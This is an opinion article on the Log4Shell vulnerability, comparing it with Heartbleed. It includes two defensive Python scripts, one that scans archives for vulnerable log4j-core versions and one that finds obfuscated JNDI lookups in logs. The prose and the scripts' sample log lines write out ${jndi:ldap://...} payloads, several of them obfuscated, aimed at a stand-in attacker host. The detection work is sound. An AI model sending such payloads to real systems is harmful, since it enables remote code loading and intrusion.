Log4Shell: Why aren't we taking the security of the internet seriously?

To be caught out once may be an oversight, and lessons can be learned. But twice over a seven-year timespan shows a laissez-faire attitude to the stability of the internet.

In 2014, Heartbleed reared its ugly head and demonstrated to the world that the open-source components that run the internet, in this case the OpenSSL library that provides SSL/TLS secure communications, can carry flaws that everyone inherits. The bug was not in the TLS standard but in OpenSSL's implementation of the TLS heartbeat extension: a missing bounds check let a remote peer read up to 64KB of process memory per request, including private keys and session data. Anyone using the library, either directly or in software that embedded it, was at risk. As a result, a large share of the internet's TLS-protected services were exposed at once.

Wind the clock forward seven years. There is now an equally devastating flaw, this time in Log4j 2, the widely used Java logging library. Dubbed Log4Shell (CVE-2021-44228), it is in one respect worse than Heartbleed: log4j is embedded everywhere, right down to the little devices in people's homes, and it usually arrives as a transitive dependency that nobody chose explicitly. The challenge is to understand where it is.

Strong software development controls

Any developers building Java applications need to ask if their applications are using log4j. In large organisations with mature software development practices, enterprise software developers usually have sound component management. This means they can identify which of their applications use software modules that require log4j, including the harder case: is it being pulled in transitively, through some other module the developer needs to build the application? A build-tool dependency tree answers that for source projects, but deployed artefacts (WAR and EAR files, fat JARs, vendor appliances) have to be inspected directly, because the copy of log4j-core that matters is the one inside the archive. The National Cyber Security Centre has urged organisations to patch applications as soon as possible. “The key step for organisations is to patch enterprise software quickly, and for developers using log4j to update and distribute their software as soon as possible,” it said in a statement.
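The following script is an added example, not code from the article or from the NCSC, of how to answer the "where is it?" question for deployed artefacts rather than build files. It walks a directory, opens every JAR/WAR/EAR, recurses into archives nested inside them (WEB-INF/lib, fat JARs) and reports each copy of log4j-core with its version, flagging 2.x releases before 2.15.0 as affected by CVE-2021-44228. The two marker paths it looks for (the Maven pom.properties for log4j-core and the JndiLookup class) are the real ones inside the library; the sample application it scans is a constructed fixture built in a temporary directory so the script runs offline.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Markers that identify log4j-core 2.x inside an archive. The JNDI lookup lives in
# log4j-core; an application that ships only log4j-api does not carry the vulnerable code.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVES = (".jar", ".war", ".ear", ".zip")


def parse_version(pom_properties):
    """Extract (major, minor, patch) from the version= line of a Maven pom.properties.
    Pre-release strings such as 2.0-beta9 do not match and come back as None."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.MULTILINE)
    return tuple(int(x) for x in m.groups()) if m else None


def is_log4shell_affected(version):
    """CVE-2021-44228 affects log4j-core 2.0-beta9 through 2.14.1; 2.15.0 was the first fix.
    Later advisories moved the recommended version up, so treat 'not affected' as a floor."""
    return version is not None and version[0] == 2 and version < (2, 15, 0)


def scan_zip(zf, label, findings):
    """Record log4j-core hits in an open ZipFile, then recurse into nested archives."""
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = None
        if POM_PROPS in names:
            version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        findings.append({
            "path": label,
            "version": version,
            "jndi_lookup_present": JNDI_CLASS in names,
            # A shaded or relocated copy with no pom.properties has no version to compare:
            # report it for manual review instead of silently passing it.
            "affected": is_log4shell_affected(version) if version else "unknown",
        })
    for name in names:
        if name.lower().endswith(ARCHIVES):
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            scan_zip(nested, f"{label}!{name}", findings)


def scan_tree(root):
    """Walk a directory and return one finding per log4j-core copy, nested ones included."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVES:
            try:
                with zipfile.ZipFile(path) as zf:
                    scan_zip(zf, str(path), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _jar(entries):
    """Build an in-memory zip from {name: bytes-or-str}; used only for the fixture."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name, data in entries.items():
            jar.writestr(name, data)
    return buf.getvalue()


def _fake_log4j_core(version):
    # Constructed stand-in: only the two marker entries, with class-file magic in place of bytecode.
    return _jar({POM_PROPS: f"version={version}\n", JNDI_CLASS: b"\xca\xfe\xba\xbe"})


def build_sample_app(root):
    """Constructed fixture: a WAR bundling log4j-core 2.14.1 plus log4j-api, and a tool on 2.17.1."""
    root = Path(root)
    with zipfile.ZipFile(root / "app.war", "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
        war.writestr("WEB-INF/lib/log4j-api-2.14.1.jar", _jar({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"}))
    with zipfile.ZipFile(root / "tool.jar", "w") as jar:
        jar.writestr("lib/log4j-core-2.17.1.jar", _fake_log4j_core("2.17.1"))


def demo():
    """Build the fixture in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_app(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['path']}: version={finding['version']} affected={finding['affected']}")
```

Point scan_tree at a deployment directory (a Tomcat webapps folder, an application server's lib directory, an unpacked appliance image) and every nested copy is listed with the path chain that leads to it. A copy reported as "unknown" is worth opening by hand: shaded builds drop the Maven metadata but keep the JndiLookup class.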

The underlying weakness has been known for years. The JNDI injection technique that makes log4j exploitable, abusing Java's naming and directory interface to fetch and load objects from a remote RMI or LDAP server, was presented at Black Hat USA 2016. But nobody had connected it to log4j, and there were no exploits in the wild. That changed fast. As of December 13, approximately 72 hours after disclosure, security firm Check Point said its systems had stopped more than 846,000 attempts to exploit log4j, 46% of them made by known malicious groups.

This raises serious questions over internet governance and funding. If the weakness had been known since 2016, why did no one fix it? Because there was no burning platform. JNDI injection was treated as an application-level mistake: it needs an application that hands attacker-controlled text to a JNDI lookup, and few were thought to do so. Log4j 2 did exactly that, by default, through its message lookup feature: any ${...} expression inside a logged string is evaluated, so a string such as ${jndi:ldap://attacker-host/a} placed in a User-Agent header, a username field or anything else that ends up in a log line makes the application contact the attacker's server and load what it returns. Proof-of-concept code written in Python shows how easily it can be triggered. The fact that coding an exploit is so simple means that Log4Shell could decimate internet security.
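Because the trigger is a lookup expression in logged text, the first thing a defender wants is to find those expressions in the logs they already have. The script below is an added example written for this article, not the proof-of-concept it mentions and not Log4j's own code. It models the part of Log4j's lookup substitution that attackers used for obfuscation (the ${lookup:key:-default} fallback and the lower/upper lookups), collapses nested lookups from the inside out until a plain ${jndi:...} surfaces, and reports every line that carries one. The access-log lines it scans are constructed samples using documentation IP ranges; the resolver is a deliberate simplification and does not attempt the other lookups (env, sys, date, base64 and so on).

```python
import re

# Innermost ${...} with no nested braces, resolved repeatedly like Log4j's substitutor.
# Only the lookups used for obfuscation are modelled: the ":-default" fallback and the
# lower/upper lookups. Everything else is frozen in place so a ${jndi:...} survives.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
FROZEN = "\x00{"  # placeholder that INNERMOST cannot re-match; restored at the end
JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve_innermost(match):
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return FROZEN + body + "}"         # keep the payload as written for reporting
    if ":-" in body:                       # ${anything:-x} falls back to x when the lookup fails
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return FROZEN + body + "}"             # env:, sys:, date:, ... left untouched


def normalize(message):
    """Collapse obfuscating lookups until the text stops changing, then unfreeze."""
    previous = None
    while previous != message:
        previous = message
        message = INNERMOST.sub(_resolve_innermost, message)
    return message.replace(FROZEN, "${")


def find_jndi_attempts(lines):
    """Return (line_number, normalized_payload) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for payload in JNDI.findall(normalize(line)):
            hits.append((number, payload))
    return hits


# Constructed access-log lines (RFC 5737 addresses). Lines 2 to 5 carry the payload in the
# User-Agent field, three of them obfuscated the way real December 2021 traffic was.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.7:1389/b}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${::-l}dap://198.51.100.7:1389/c}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/d}"',
]


if __name__ == "__main__":
    for number, payload in find_jndi_attempts(SAMPLE_LOG):
        print(f"line {number}: {payload}")
```

A hit in an access log only proves an attempt; whether the lookup fired depends on the log4j-core version behind that endpoint. Pair the search with outbound connection records (LDAP on 389/1389, RMI on 1099) from the same hosts, and remember the documented mitigations while upgrading: on 2.10 through 2.14.1 set log4j2.formatMsgNoLookups=true, and on any 2.x release the JndiLookup class can be deleted from the jar.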

We should have learned from Heartbleed. Flaws within the code that forms the internet affect us all.